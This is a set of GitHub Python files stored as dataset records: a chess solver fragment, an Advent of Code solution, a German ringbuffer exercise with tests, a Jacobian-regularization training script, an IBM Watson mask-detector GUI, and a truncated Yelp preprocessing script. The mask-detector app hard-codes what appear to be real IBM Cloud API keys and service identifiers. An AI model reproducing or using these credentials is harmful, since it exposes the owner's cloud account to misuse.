p2.x and p1.y == p2.y):\n\t\t\t\treturn []\n\n\tnewboard.extend(board1.copy())\n\tnewboard.extend(board2.copy())\n\n\t#printboard(newboard)\n\n\treturn newboard\n\n# Given 3 lists of boards, it returns all given combinations of the 3 types of boards.\ndef combineboards(queen_boards, rook_boards, bish_boards):\n\tcombinedall = []\n\tcombinedqr = []\n\tfor q in queen_boards:\n\t\tfor r in rook_boards:\n\t\t\tcombined = comboard(q, r)\n\t\t\tif (combined == []):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcombinedqr.append(combined)\n\t\t\t\t#print(\"- \" * 20)\n\t\t\t\t#printboard(combined)\n\n\t\n\t\n\tfor c in combinedqr:\n\t\tfor b in bish_boards:\n\t\t\tcombined = comboard(c, b)\n\t\t\tif (combined == []):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcombinedall.append(combined)\n\n\treturn combinedall\n\n\n\n\nrook_boards = []\nmake_rook_boards([], 0)\n\nbish_boards = []\nmake_bish_boards()\n\nqueen_boards = []\nmake_queen_boards([], 0)\n\n\ncombined = combineboards(queen_boards, rook_boards, bish_boards)\n\nsolved = []\n\nknight_boards = []\nmake_knight_boards(combined)\n\n\n\n\n\n\n\nfor b in solved:\n\tprint('- ' * 20)\n\tprintchessboard(b)\n\tprint('- ' * 20)\nprint(\"numsolutions = \", len(solved))\nprint(\"length = \", len(solved[0]) - 1)\n\n#print(len(combined))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"draketmoore/crowded-chessboard-solver","sub_path":"nonsatsolver.py","file_name":"nonsatsolver.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"10571341977","text":"import re\nfrom day4_1 import _get_input\n\n\ndef find_overlaps():\n assignments = _get_input()\n total = 0\n \n for pair in assignments:\n a, b, c, d = list(map(int, re.findall('(\\d+)', pair)))\n \n if (c <= b <= d) or (c <= a <=d) \\\n or (a <= c <= b) or (a <= d <=b):\n total += 1\n else:\n print(a,b,c,d)\n\n return total\n\nprint(find_overlaps())","repo_name":"urszkam/AoC_2022","sub_path":"python/day4/day4_2.py","file_name":"day4_2.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"19938137179","text":"import unittest, random, copy\r\nimport timeit\r\nimport ringbuffer\r\n\r\n# Variante 1:\r\n# push durch Vergrößern um ein Element\r\n# popFirst durch Verschieben nach vorne\r\nclass UniversalContainer1:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n self.data_ = [None]*self.capacity_\r\n self.size_ = 0\r\n\r\n def size(self):\r\n return self.size_\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item):\r\n if self.capacity_ == self.size_:\r\n self.capacity_ += 1 # Kapazität wird um eins vergrößert…\r\n self.data += [None] # …und in data reflektiert\r\n self.data_[self.size_] = item\r\n self.size_ += 1\r\n\r\n def popFirst(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.size_ -= 1\r\n for i in range(self.size_):\r\n self.data_[i] = self.data_[i+1]\r\n\r\n def popLast(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.size_ -= 1\r\n\r\n def __getitem__(self, index): # __getitem__ implementiert v = c[index]\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[index]\r\n\r\n def __setitem__(self, index, v): # __setitem__ implementiert c[index] = v\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[index] = v\r\n\r\n def first(self):\r\n return self.__getitem__(0)\r\n\r\n def last(self):\r\n return self.__getitem__(self.size_ - 1)\r\n\r\n# Variante 2\r\n# push durch Verdoppeln\r\n# popFirst durch Verschieben nach vorne\r\nclass UniversalContainer2:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n self.data_ = [None]*self.capacity_\r\n self.size_ = 0\r\n\r\n def size(self):\r\n return self.size_\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item):\r\n if self.capacity_ == self.size_:\r\n self.capacity_ *= 2 # Kapazität verdoppeln…\r\n self.data_ += [None]*self.size_ # …und in self.data reflektieren\r\n self.data_[self.size_] = item\r\n self.size_ += 1\r\n\r\n def popFirst(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.size_ -= 1\r\n for i in range(self.size_):\r\n self.data_[i] = self.data_[i+1]\r\n\r\n def popLast(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.size_ -= 1\r\n\r\n def __getitem__(self, index):\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[index]\r\n\r\n def __setitem__(self, index, v):\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[index] = v\r\n\r\n def first(self):\r\n return self.__getitem__(0)\r\n\r\n def last(self):\r\n return self.__getitem__(self.size_ - 1)\r\n\r\n# Variante 3:\r\n# push durch Verdoppeln der Kapazität\r\n# popFirst als ringbuffer\r\nclass UniversalContainer3:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n\r\n # Idee:\r\n # * wenn first_ == last_: container ist leer\r\n # * wenn first_ == (last_ + 1) % len(data_): container ist voll\r\n # Wir brauchen also immer ein Element mehr als Kapazität, damit wir auf\r\n # dieses zeigen können falls voll ist.\r\n self.data_ = [None]*(self.capacity_+1)\r\n self.first_ = self.last_ = 0\r\n\r\n def size(self): # Wir berechnen die Größe aus last_ und first_\r\n return (self.last_ - self.first_) % len(self.data_)\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item): # add item at the end\r\n if self.capacity_ == self.size():\r\n self.capacity_ *= 2 # Kapazität verdoppeln…\r\n new_data = [None]*(self.capacity_ + 1) # …und im Speicher reflektieren\r\n\r\n # Daten kopieren. Hier kann nicht einfach nur angehängt werden, da\r\n # ggf. Dinge merkwürdig gespeichert sind und wir sie hier wieder\r\n # \"auf Anfang\" setzen wollen.\r\n for i in range(self.size()):\r\n new_data[i] = self.data_[(self.first_ + i) % len(self.data_)]\r\n # Aktualisieren der Grenzen. Wir müssen erst last_ ändern, weil\r\n # size() sonst einen falschen Wert zurückgibt.\r\n self.last_ = self.size()\r\n self.first_ = 0\r\n self.data_ = new_data\r\n self.data_[self.last_] = item\r\n self.last_ = (self.last_ + 1) % len(self.data_)\r\n\r\n def popFirst(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.first_ = (self.first_ + 1) % len(self.data_)\r\n\r\n def popLast(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.last_ = (self.last_ - 1) % len(self.data_)\r\n\r\n def __getitem__(self, index):\r\n if index < 0 or index >= self.size():\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[(index + self.first_) % len(self.data_)]\r\n\r\n def __setitem__(self, index, v):\r\n if index < 0 or index >= self.size():\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[(index + self.first_) % len(self.data_)] = v\r\n\r\n def first(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"first() on empty container\")\r\n return self.data_[self.first_]\r\n\r\n def last(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"last() on empty container\")\r\n return self.data_[(self.last_ - 1) % len(self.data_)]\r\n\r\n def __str__(self):\r\n res = '['\r\n for i in range(self.size()):\r\n if i > 0:\r\n res += ', '\r\n res += str(self[i])\r\n res +=']'\r\n return res\r\n\r\n\r\ndef containersEqual(left, right):\r\n if left.size() != right.size():\r\n return False\r\n for i in range(left.size()):\r\n if left[i] != right[i]:\r\n return False\r\n return True\r\n\r\nclass TestContainer(unittest.TestCase):\r\n def checkSimple(self, Type):\r\n # teste leeren Container\r\n c = Type()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste push() in leeren Container\r\n c.push(1)\r\n assert c.size() == 1\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 1\r\n assert c.last() == 1\r\n assert c[0] == 1\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popLast() bei size==1\r\n c.popLast()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste push() von zwei Elementen, gefolgt von popLst()\r\n c.push(1)\r\n c_old = copy.deepcopy(c)\r\n c.push(2)\r\n assert c.size() == 2\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 1\r\n assert c.last() == 2\r\n assert c[0] == 1\r\n assert c[1] == 2\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n c.popLast()\r\n assert containersEqual(c, c_old)\r\n\r\n # teste popFirst() bei zwei Elementen\r\n c.push(2)\r\n c.popFirst()\r\n assert c.size() == 1\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 2\r\n assert c.last() == 2\r\n assert c[0] == 2\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n c.popFirst()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste c[k] = v bei vier Elementen\r\n c.push(2)\r\n c.push(3)\r\n c.push(4)\r\n c.push(5)\r\n for k in range(c.size()):\r\n c_old = copy.deepcopy(c)\r\n c[k] = k + 6\r\n for i in range(c.size()):\r\n if i != k:\r\n assert c[i] == c_old[i]\r\n else:\r\n assert c[i] == k + 6\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popFirst() bei vier Elementen\r\n c_old = copy.deepcopy(c)\r\n c.popFirst()\r\n assert c.size() == 3\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 7\r\n assert c.last() == 9\r\n for i in range(c.size()):\r\n assert c[i] == c_old[i+1]\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popLast() bei drei Elementen\r\n c_old = copy.deepcopy(c)\r\n c.popLast()\r\n assert c.size() == 2\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 7\r\n assert c.last() == 8\r\n for i in range(c.size()):\r\n assert c[i] == c_old[i]\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n def testContainer1(self):\r\n self.checkSimple(UniversalContainer1)\r\n\r\n def testContainer2(self):\r\n self.checkSimple(UniversalContainer2)\r\n\r\n def testContainer3(self):\r\n self.checkSimple(UniversalContainer3)\r\n\r\n # Konstruktor und das Verhalten bei leerer UniversalContainer3 werden getestet\r\n def testConstructor(self):\r\n q = UniversalContainer3()\r\n self.assertEqual(q.capacity(), 1)\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # push() wird getestet\r\n def testPush(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n\r\n for i in range(0, y):\r\n q.push(i)\r\n self.assertEqual(q.size(), i+1)\r\n self.assertTrue(q.size() <= q.capacity())\r\n\r\n # UniversalContainer3 wird n-mal gepushed und mit popLast() (n+1)-mal gepopped.\r\n # Das letzte popLast() muss eine Exception ausloesen (leere UniversalContainer3).\r\n def testPopLast(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n for i in range(0, y):\r\n q.push(i)\r\n\r\n for i in range(y, 0, -1):\r\n self.assertEqual(q.size(), i)\r\n self.assertEqual(q.last(), i-1)\r\n q.popLast()\r\n\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # UniversalContainer3 wird n-mal gepushed und mit popFirst() (n+1)-mal gepopped.\r\n # Das letzte popFirst() muss eine Exception ausloesen (leere UniversalContainer3).\r\n def testPopFirst(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n for i in range(0, y):\r\n q.push(i)\r\n\r\n for i in range(y, 0, -1):\r\n self.assertEqual(q.size(), i)\r\n self.assertEqual(q.first(), y-i)\r\n q.popFirst()\r\n\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n\r\n # push(), popFirst() und popLast() werden in zufaelliger Kombination\r\n # getestet. Dies wird 10-mal wiederholt.\r\n # (Wir fuellen die UniversalContainer3 am Anfang mit 115 Elementen, so dass ein\r\n # Fehler wegen leerer UniversalContainer3 praktisch ausgeschlossen ist.)\r\n def testRand(self):\r\n for k in range(10):\r\n q = UniversalContainer3()\r\n sizeCount = 115\r\n for i in range(sizeCount):\r\n q.push(i)\r\n self.assertEqual(q.size(), sizeCount)\r\n\r\n for i in range(400):\r\n dec = random.randint(0,3)\r\n if dec <= 1:\r\n q.push(None)\r\n sizeCount += 1\r\n elif dec == 2:\r\n q.popFirst()\r\n sizeCount -= 1\r\n elif dec == 3:\r\n q.popLast()\r\n sizeCount -= 1\r\n self.assertEqual(q.size(), sizeCount)\r\n\r\n # Teste, ob die Implementation des Rings korrekt ist.\r\n def testShiftRight(self):\r\n q = UniversalContainer3()\r\n\r\n # 10 Elemente einfuegen\r\n for i in range(0,10):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 10)\r\n self.assertEqual(q.first_, 0)\r\n self.assertEqual(q.last_, 10)\r\n\r\n # die ersten 6 Elemente entfernen\r\n for i in range(0,6):\r\n q.popFirst()\r\n self.assertEqual(q.size(), 4)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # weitere 10 Elemente einfuegen => last_\r\n # ueberschreitet die Arraygrenze und ist jetzt\r\n # kleiner als first_\r\n for i in range(0,10):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 14)\r\n self.assertGreater(q.first_, q.last_)\r\n\r\n # 6 Elemente am Ende entfernen => last_\r\n # ueberschreitet die Arraygrenze in der anderen\r\n # Richtung und ist wieder groesser als first_\r\n for i in range(0,6):\r\n q.popLast()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 8)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # die uebrigen Elemente am Ende entfernen =>\r\n # UniversalContainer3 muss jetzt leer sein\r\n for i in range(0,8):\r\n q.popLast()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 0)\r\n self.assertEqual(q.first_, q.last_)\r\n\r\n # weiteres Entfernen muss Exception ausloesen\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # 14 neue Elemente einfuegen => last_\r\n # ueberschreitet die Arraygrenze erneut und\r\n # ist kleiner als first_\r\n for i in range(0,14):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 14)\r\n self.assertGreater(q.first_, q.last_)\r\n\r\n # 11 Elemente am Anfang entfernen => first_\r\n # ueberschreitet die Arraygrenze ebenfalls und\r\n # ist nun wieder kleiner als last_\r\n for i in range(0,11):\r\n q.popFirst()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 3)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # die uebrigen Elemente am Anfang entfernen =>\r\n # UniversalContainer3 muss jetzt leer sein\r\n for i in range(0,3):\r\n q.popFirst()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 0)\r\n self.assertEqual(q.first_, q.last_)\r\n\r\n # weiteres Entfernen muss Exception ausloesen\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # 20 neue Elemente einfuegen => das interne Array wird\r\n # verdoppelt, first_ und last_ daher zurueckgesetzt\r\n for i in range(0,20):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 32)\r\n self.assertEqual(q.size(), 20)\r\n self.assertEqual(q.first_, 0)\r\n self.assertEqual(q.last_, 20)\r\n\r\ndef examples():\r\n test = UniversalContainer3()\r\n test.push(1)\r\n test.push(2)\r\n test.push(3)\r\n print(\"before:\", test, \"first:\", test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(4)\r\n print(\" after push(4):\", test, \"first:\", test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(5)\r\n print(\" after push(5):\", test, \"first:\", test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(6)\r\n print(\" after push(6):\", test, \"last:\", test.last())\r\n test.popLast()\r\n print(\" after popLast():\", test, \"last:\", test.last())\r\n test.popLast()\r\n try:\r\n print(\" after popLast():\", test, \"last:\", test.last())\r\n except:\r\n print(\"UniversalContainer3 empty!\")\r\n\r\ndef timingPush():\r\n push = '''\r\nfor i in range(N):\r\n c.push(i)\r\n'''\r\n pop = '''\r\nfor i in range(N):\r\n c.popFirst()\r\n'''\r\n repeats = 5\r\n scope = globals()\r\n for m in range(1,4):\r\n variant = \"ringbuffer.UniversalContainer%d\" % m\r\n print(variant, \"push\")\r\n for k in range(5,11):\r\n N = 2**k\r\n scope['N'] = N\r\n t = timeit.Timer(push, \"c = %s()\" % variant , globals=scope)\r\n time = min(t.repeat(repeats, 1))\r\n print(\"N = %4d\" % N, \"total: %f ms,\" % (time*1000), \"amortized: %f us\" % (time/N*1e6))\r\n for m in range(1,4):\r\n variant = \"ringbuffer.UniversalContainer%d\" % m\r\n print(variant, \"popFirst\")\r\n for k in range(5,11):\r\n N = 2**k\r\n scope['N'] = N\r\n t = timeit.Timer(pop, (\"c = %s()\\n\" % variant) + push, globals=scope)\r\n time = min(t.repeat(repeats, 1))\r\n print(\"N = %4d\" % N, \"total: %f ms,\" % (time*1000), \"amortized: %f us\" % (time/N*1e6))\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running UniversalContainer3 examples:\")\r\n examples()\r\n\r\n print(\"\\nTiming\\n------\")\r\n timingPush()\r\n\r\n print(\"\\nRunning tests\\n-------------\")\r\n unittest.main()\r\n","repo_name":"koebi/alda_ss19","sub_path":"loesungen/zettel04/ringbuffer.py","file_name":"ringbuffer.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"17427267052","text":"import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\nfrom utils import load_data\nfrom models import ResNet18, ResNet50, ResNet152, CIFAR_CNN\n\n\nMETHOD = 'jac-reg' # jacobian regularization\nLAMDA_ALPHA = 100.0\n\n#METHOD = 'last-reg' # last layer regularization\n#LAMDA_ALPHA = 0.01\n\nmodel_arch = 'cifarcnn'\n#model_arch = 'resnet18'\n\nSAVE_PATH='./saved_model/%s-%.4f.pth'%(METHOD,LAMDA_ALPHA)\nif model_arch != 'resnet18':\n SAVE_PATH = SAVE_PATH[:-4] + '-%s'%model_arch + '.pth'\nprint (SAVE_PATH)\n\ntrainset, testset, trainloader, testloader, normalizer = load_data()\nprint (len(trainset), len(testset))\n\nif model_arch == 'resnet18':\n model = ResNet18(normalizer, dropout=0.0)\nelif model_arch == 'cifarcnn':\n model = CIFAR_CNN(normalizer, dropout=0.0)\nmodel = model.to('cuda')\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=(0.01 if model_arch == 'cifarcnn' else 0.1), momentum=0.9, weight_decay=5e-4)\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[100,150], gamma=0.1)\n\ndef train(epoch):\n print('\\nEpoch: %d' % epoch)\n model.train()\n train_loss = 0\n train_loss_reg = 0\n correct = 0\n total = 0\n with tqdm(trainloader) as pbar:\n for batch_idx, (x, y) in enumerate(pbar):\n x, y = x.to('cuda'), y.to('cuda')\n x.requires_grad_()\n\n features = model.calc_representation(x)\n pred = model.linear(features)\n loss = criterion(pred, y)\n\n if METHOD == 'jac-reg':\n tgt_val = features.norm(2, dim=1).mean()\n tgt_val.backward(create_graph=True)\n loss_reg = x.grad.view(x.shape[0], -1).norm(2, dim=1).mean()\n elif METHOD == 'last-reg':\n loss_reg = model.linear.weight.view(-1).norm()\n tgt_val = None\n else:\n raise NotImplementedError()\n loss = loss + LAMDA_ALPHA * loss_reg\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n train_loss_reg += loss_reg.item()\n _, pred_c = pred.max(1)\n total += y.size(0)\n correct += pred_c.eq(y).sum().item()\n pbar.set_description('Loss: %.3f | Loss_reg: %.3f | Acc:%.3f%%'%(train_loss/(batch_idx+1), train_loss_reg/(batch_idx+1), 100.*correct/total))\n del tgt_val\n del loss_reg\n del x.grad\n torch.cuda.empty_cache()\n\n acc = 100.*correct/total\n return train_loss/len(trainloader), acc\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n with torch.no_grad(), tqdm(testloader) as pbar:\n for batch_idx, (x, y) in enumerate(pbar):\n x, y = x.to('cuda'), y.to('cuda')\n pred = model(x)\n loss = criterion(pred, y)\n\n test_loss += loss.item()\n _, pred_c = pred.max(1)\n total += y.size(0)\n correct += pred_c.eq(y).sum().item()\n pbar.set_description('Loss: %.3f | Acc:%.3f%%'%(test_loss/(batch_idx+1), 100.*correct/total))\n\n acc = 100.*correct/total\n return test_loss/len(testloader), acc\n\n\nbest_acc = 0.0\nfor epoch in range(200):\n train(epoch)\n _, cur_acc = test(epoch)\n scheduler.step()\n if cur_acc > best_acc:\n best_acc = cur_acc\n torch.save(model.state_dict(), SAVE_PATH)\n","repo_name":"AI-secure/transferability-versus-robustness","sub_path":"train_reg.py","file_name":"train_reg.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"19915783278","text":"from ibm_watson import VisualRecognitionV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nimport json\nimport os\nimport shutil\nimport ibm_boto3\nfrom ibm_botocore.client import Config\nfrom zipfile import ZipFile\nfrom tkinter import *\nimport tkinter.font as font\nfrom tkinter.filedialog import askdirectory\nfrom PIL import ImageTk, Image\nfrom datetime import date\n\n# set watson vr service credentials\niam = IAMAuthenticator(\"8u43aL-G3G-dNVCwDRCM8k_G7J_zBFxR3fY3hmSOmsGV\")\nvr = VisualRecognitionV3(\n version= \"2018-03-19\",\n authenticator = iam\n)\nvr.set_service_url(\"https://api.eu-de.visual-recognition.watson.cloud.ibm.com/instances/f2070f39-5b4b-42c1-a37c-8344e52040e8\")\n\n# function to browse, classify local images\ndef classifyLocal():\n dir = './no-mask/'\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n location = askdirectory()\n for file in os.listdir(location):\n if file.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')) :\n result=vr.classify(classifier_ids=\"ClassificationModel_885635333\",threshold='0.6',images_file=open(location+\"/\"+file,\"rb\")).get_result()\n print(json.dumps(result, indent=2))\n if float(result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"score\"]) >= 0.9:\n print(\"image contains \"+result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"class\"])\n if result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"class\"] == \"no mask\":\n shutil.copy(location+\"/\"+file,dir)\n print(\"send to cloud\")\n else: print(\"bad image, cannot classify\")\n else: print(\"not an image file error\")\n print(\"classification complete\")\n notif1=Label(text=\"Classification Complete!\",fg=\"green\")\n notif1.pack()\n\n# function to upload classified folder to cloud object storage\ndef upload():\n cos = ibm_boto3.client(service_name='s3',ibm_api_key_id=\"TOcnjLwKhBWfhiONJJjoeyQAVLOejD63dHlGzQFlsoah\",\n ibm_service_instance_id=\"crn:v1:bluemix:public:iam-identity::a/b3dd5352f75d455d8b3196a7543276eb::serviceid:ServiceId-5f6c7a2b-9d4a-4ec4-b6a6-cdbce4be228f\",\n config=Config(signature_version='oauth'),endpoint_url=\"https://s3.eu.cloud-object-storage.appdomain.cloud\")\n # create a ZipFile object\n with ZipFile('no-mask.zip', 'w') as zipObj:\n for image in os.listdir(\"./no-mask/\"):\n # Add file to zip\n zipObj.write(\"./no-mask/\"+image )\n d1 = date.today().strftime(\"%d/%m/%Y\")\n try:\n res = cos.upload_file('./no-mask.zip',Bucket='maskdetector-donotdelete-pr-2vtgzmmygdbdsb', Key='result-'+d1+'.zip')\n except Exception as e:\n print(Exception, e)\n else:\n print('File Uploaded')\n notif2=Label(text=\"Upload Complete!\",fg=\"green\")\n notif2.pack()\n\n# function to download prev results from cloud\ndef download():\n cos = ibm_boto3.client(service_name='s3',ibm_api_key_id=\"TOcnjLwKhBWfhiONJJjoeyQAVLOejD63dHlGzQFlsoah\",\n ibm_service_instance_id=\"crn:v1:bluemix:public:iam-identity::a/b3dd5352f75d455d8b3196a7543276eb::serviceid:ServiceId-5f6c7a2b-9d4a-4ec4-b6a6-cdbce4be228f\",\n config=Config(signature_version='oauth'),endpoint_url=\"https://s3.eu.cloud-object-storage.appdomain.cloud\")\n try:\n res2 = cos.download_file(Bucket='maskdetector-donotdelete-pr-2vtgzmmygdbdsb',Key='result-'+resdate.get()+'.zip',Filename='./downloaded-results.zip')\n except Exception as e:\n print(Exception, e)\n notif4=Label(text=\"Date not found!\",fg=\"red\")\n notif4.pack()\n else:\n print('File Downloaded')\n notif3=Label(text=\"Download Complete!\",fg=\"green\")\n notif3.pack()\n\n# >> tkinter gui code from this point >>\nroot = Tk()\nroot.title(\"Mask Detector\")\n\n# set app icon\np1 = PhotoImage(file = \"icon.png\")\nroot.iconphoto(False, p1)\n\n# set window size\nw, h = root.winfo_screenwidth(), root.winfo_screenheight()-70\nroot.geometry(\"%dx%d+0+0\" % (w/2, h))\n\nimg = ImageTk.PhotoImage(Image.open(\"banner.png\"))\npanel = Label(root, image = img)\npanel.pack(side = \"top\", fill = \"both\")\n\nwelcome = Label(root,text=\"Mask Detector\")\nwelcome[\"font\"] = font.Font(family='Courier', size=30, weight='bold')\nwelcome.pack()\n\nstep1 = Label(text=\"Step1: Browse the folder containg the images for classification\",fg=\"#0F216C\",highlightbackground='red')\nstep1.pack()\n\nbutton0 = Button(root, text=\"[ Browse ]\", command=classifyLocal) \nbutton0.pack(side=TOP)\n\nstep2 = Label(text=\"\\nStep2: Do you want to upload the results to cloud?\",fg=\"#0F216C\")\nstep2.pack()\n\nbutton1 = Button(root, text=\"[ Upload ]\", command=upload) \nbutton1.pack(side=TOP)\n\nstep3 = Label(text=\"\\nStep3: Download previous results.\\n Please enter the date(dd/mm/yyyy) for which you need results\",fg=\"#0F216C\")\nstep3.pack()\n\nresdate = Entry(root) \nresdate.pack()\n\nbutton2 = Button(root, text=\"[ Download ]\", command=download) \nbutton2.pack(side=TOP)\n\nlog = Label(text=\"\\nLog:\",fg=\"#0F216C\")\nlog.pack()\n\nroot.mainloop()\n\n\n","repo_name":"sneha-meto/Mask-Detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"4664785160","text":"import os\nimport json\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '-bm', '--business_meta', required=True, help=\"Business metadata\"\n)\nparser.add_argument(\n '-um', '--user_meta', required=True, help=\"User info metadata\"\n)\nparser.add_argument(\n '-r', '--review', required=True, help=\"Review file\"\n)\nparser.add_argument(\n '-f', '--folder', required=True, help=\"Folder to write outputs\"\n)\nargs = parser.parse_args()\n\n\"\"\"\nAttributes to collect\n\n1. Review content\n2. Reviewer name\n3. Review score\n4. Business categories\n\"\"\"\n\n# First Read the meta-data and collect everything into a dictionary.\n\nb_meta_dict = {}\nb_meta_file = open(args.business_meta, 'r')\nprint('Processing Business metadata file ...')\nfor idx, line in enumerate(b_meta_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n if 'categories' in parsed_line:\n categories = parsed_line['categories']\n b_meta_dict[parsed_line['business_id']] = categories\n\nu_meta_dict = {}\nu_meta_file = open(args.user_meta, 'r')\nprint('Processing User metadata file ...')\nfor idx, line in enumerate(u_meta_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n if 'name' in parsed_line:\n name = parsed_line['name']\n u_meta_dict[parsed_line['user_id']] = name\n\nf_rev = open(os.path.join(args.folder, 'reviews.txt'), 'w')\nf_rev_name = open(os.path.join(args.folder, 'reviewer_name.txt'), 'w')\nf_score = open(os.path.join(args.folder, 'scores.txt'), 'w')\nf_cat = open(os.path.join(args.folder, 'categories.txt'), 'w')\n\nreview_file = open(args.review, 'r')\nprint('Processing review file ...')\nfor idx, line in enumerate(review_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n uid = parsed_line['user_id']\n bid = parsed_line['business_id']\n review = parsed_line['text'].replace('\\n', '')\n score = str(parsed_line['stars'])\n if uid in u_meta_dict:\n uname = u_meta_dict[uid]\n else:\n uname = 'N/A'\n if bid in b_meta_dict and b_meta_dict[bid] is not None:\n bcat = '\\t'.join(b_meta_dict[bid].split(', '))\n else:\n bcat = 'N/A'\n f_rev.write(review.strip() + '\\n')\n f_rev_name.write(uname.strip() + '\\n')\n f_score.write(str(score) + '\\n')\n f_cat.write(bcat + 